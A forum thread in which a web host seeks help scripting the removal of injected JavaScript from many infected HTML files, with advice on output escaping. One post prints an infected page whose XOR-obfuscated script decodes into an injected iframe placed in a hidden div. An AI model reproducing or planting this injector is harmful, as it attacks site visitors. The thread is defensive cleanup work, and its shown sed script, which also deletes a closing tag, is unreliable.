Shell Programming and Scripting

Why fix the infected files? Don't you keep a sane copy of your static pages and scripts offline at a safe place?

Your CGI/PHP/etc. ought to be implemented in such a way to have converted '<' and '>' received to '&lt;' and '&gt;' before generating the output. Injection will not have been successful if this check exists.

The script seems to be working fine.. thanks a lot.. i will let you know the effectiveness of the script after I run it serverwide.

Hello cbkihong,

Please explain --->

Your CGI/PHP/etc. ought to be implemented in such a way to have converted '<' and '>' received to '&lt;' and '&gt;' before generating the output. Injection will not have been successful if this check exists.



Thanks.

What I meant was this:

Neither fixing the defaced files nor replacing them is patching the security hole. The issue occurs because your PHP/CGI does not replace all '<' and '>' with their HTML entities counterpart (&lt; &gt in dynamically generated text when generating HTML output. If your PHP/CGI has implemented this, even though people try to inject script sections into your HTML files, they will not become executable Javascript and at least the attack is not successful because browsers will not treat them as script and execute them (people will see some strange Javascript code on the page, but you should be monitoring such, right?).

Try search for more information online on javascript injection. There are many patterns for these kinds of attacks.

Hi,

There seems to be problems still with pages that have genuine javascript code.



Anyways... thank you very much for your advise.

Hello sb008,

I finally found that the script works perfect except that it removes the last line of instead of just "</script>" ....

To explain you shown I have added the test below...

If you notice you will fine that.. for the line that has javascript closing code..
</script> it removes </html> from </script> </html>. If this can be fixed... the script will work superb.




root@server2 [/home/planetc]# cat /root/replaceJavInfect
find /home/planetc/public_html -type f -exec grep -l 'id="testws35fdgh"' {} \; | \
while read FILE
do
awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' ${FILE} | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > /tmp/whatsinaname
cp /tmp/whatsinaname ${FILE}
done





root@server2 [/home/planetc]# cat public_html/templates/fjt_cortrivenus/index.html
<html><body bgcolor="#FFFFFF"></body><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 = "\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 = "\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 = "\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = "\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32\x68"; var11 = "\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33\x27"; var12 = "\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script> </html>





root@server2 [/home/planetc/public_html]# cat templates/fjt_cortrivenus/index.html
<html><body bgcolor="#FFFFFF"></body>
root@server2 [/home/planetc/public_html]#





Please advise.

Thanks

Hello,


Please advise how can I remove upto </script> from <script> without removing </html> .. if it is on the same line with </script>

</script> </html>


Please read the last post for exact details.



Thanks.